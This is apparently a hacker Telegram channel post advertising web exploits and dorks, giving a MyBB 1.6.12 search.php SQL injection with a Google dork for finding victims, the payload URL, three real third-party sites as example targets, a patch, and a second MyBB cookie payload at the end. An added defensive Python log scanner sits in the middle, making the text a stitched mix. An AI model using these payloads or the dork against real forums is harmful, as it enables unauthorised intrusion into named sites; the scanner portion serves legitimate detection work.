0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

#Exploit - #Dork - #MYBB
——————————-
[+] Exploit Name: MYBB 1.6.12 search.php Sql injection
[+] Google Dork : intext:"powered by Mybb"
[+] Version: 1.6.12
SQL vulnerability in MYBB 1.6.12
——————————-
|~Exploit :
Append the following to the site's URL.
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Demo :

http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Error :

Warning [2] mysqli_real_escape_string() expects parameter 2 to be string, array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19-1~dotdeb.1 (Linux)

|~Exm :

1) http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
2) http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
3) http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

***************************************************

[+] How To patch :

Open search.php and find the following part:
$sid = $db->escape_string($mybb->input['sid']);

and change it to the following code:
// sid sent as an array (sid[0]=...): flatten it to a string before escaping
if(is_array($mybb->input['sid'])) {
    $sid = $db->escape_string(implode($mybb->input['sid']));
} else {
    $sid = $db->escape_string($mybb->input['sid']);
}
=======================================
T.me/LearnExploit
0Day.Today Boy's
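
For defenders checking whether a forum has received this kind of request: the script below is an added example, not part of the original post or of MyBB. It scans web access logs for search.php requests in which sid arrives as an array parameter (sid[0]=..., sid%5B%5D=...), the input shape that produces the warning above. The log lines are constructed samples, and the "combined" log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] "GET /search.php?action=results&sid=9afaea732cb32f06fa34b1888bd237e2&sortby=&order= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2014:10:00:05 +0000] "GET /search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order= HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2014:10:00:09 +0000] "GET /forum/search.php?action=results&sid%5B%5D=x HTTP/1.1" 200 812 "-" "curl/7.30"
192.0.2.77 - - [01/Jan/2014:10:01:00 +0000] "GET /showthread.php?tid=5&sid[0]=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# client IP, timestamp, method and request target of one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')


def array_sid_keys(target):
    """Return the query keys that pass sid as an array to search.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/search.php"):
        return []
    # parse_qsl percent-decodes keys, so sid%5B0%5D is seen as sid[0]
    keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    return [k for k in keys if k.lower().startswith("sid[")]


def scan(log_text):
    """Return one record per log line that sends sid as an array."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, method, target = m.groups()
        keys = array_sid_keys(target)
        if keys:
            hits.append({"ip": ip, "time": ts, "method": method, "keys": keys})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a sid array sent in a POST body would need request-body logging to be seen.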
MyBB Exploit

/index.php?_COOKIE=%C3%A2%E2%82%AC%C5%A0

#mybb #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army